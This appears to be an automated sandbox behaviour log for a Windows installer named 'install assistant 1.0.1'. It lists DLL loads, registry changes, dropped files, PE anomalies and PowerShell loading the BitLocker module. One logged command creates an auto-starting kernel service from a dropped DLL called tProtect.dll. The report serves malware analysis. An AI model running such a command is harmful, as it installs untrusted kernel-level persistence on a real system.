Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe

Static file information: File size 8595621 > 1048576

Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 11_2_002057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,

11_2_002057D0

Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x3439cd
Source: update.vac.1.dr	Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: update.vac.7.dr	Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe	Static PE information: real checksum: 0x0 should be: 0x838234
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.6.dr	Static PE information: real checksum: 0x0 should be: 0x3439cd
Source: hrsw.vbc.7.dr	Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: tProtect.dll.13.dr	Static PE information: real checksum: 0x1eb0f should be: 0xfc66

Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe	Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr	Static PE information: section name: .didata
Source: update.vac.1.dr	Static PE information: section name: .00cfg
Source: update.vac.1.dr	Static PE information: section name: .voltbl
Source: update.vac.1.dr	Static PE information: section name: .8Tk
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.6.dr	Static PE information: section name: .didata
Source: 7zr.exe.7.dr	Static PE information: section name: .sxdata
Source: update.vac.7.dr	Static PE information: section name: .00cfg
Source: update.vac.7.dr	Static PE information: section name: .voltbl
Source: update.vac.7.dr	Static PE information: section name: .8Tk
Source: hrsw.vbc.7.dr	Static PE information: section name: .00cfg
Source: hrsw.vbc.7.dr	Static PE information: section name: .voltbl
Source: hrsw.vbc.7.dr	Static PE information: section name: .8Tk

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCA86EB push ecx; ret	7_2_6CCA86FE
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CB50F00 push ss; retn 0001h	7_2_6CB50F0A
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD76F10 push eax; ret	7_2_6CD76F2E
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCDB9F4 push 004AC35Ch; ret	7_2_6CCDBA0E
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD77290 push eax; ret	7_2_6CD772BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001845F4 push 0022C35Ch; ret	11_2_0018460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0021FB10 push eax; ret	11_2_0021FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0021FE90 push eax; ret	11_2_0021FEBE

Source: update.vac.1.dr	Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: update.vac.7.dr	Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: hrsw.vbc.7.dr	Static PE information: section name: .8Tk entropy: 7.190790923053346

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	File created: C:\Program Files (x86)\Windows NT\hrsw.vbc	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	File created: C:\Users\user\AppData\Local\Temp\is-SN9SA.tmp\update.vac	Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe	File created: C:\Program Files (x86)\Windows NT\tProtect.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	File created: C:\Program Files (x86)\Windows NT\7zr.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	File created: C:\Users\user\AppData\Local\Temp\is-SN9SA.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	File created: C:\Users\user\AppData\Local\Temp\is-L8408.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	File created: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	File created: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	File created: C:\Users\user\AppData\Local\Temp\is-L8408.tmp\_isetup\_setup64.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	File created: C:\Users\user\AppData\Local\Temp\is-L8408.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	File created: C:\Users\user\AppData\Local\Temp\is-SN9SA.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	File created: C:\Program Files (x86)\Windows NT\hrsw.vbc	Jump to dropped file

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
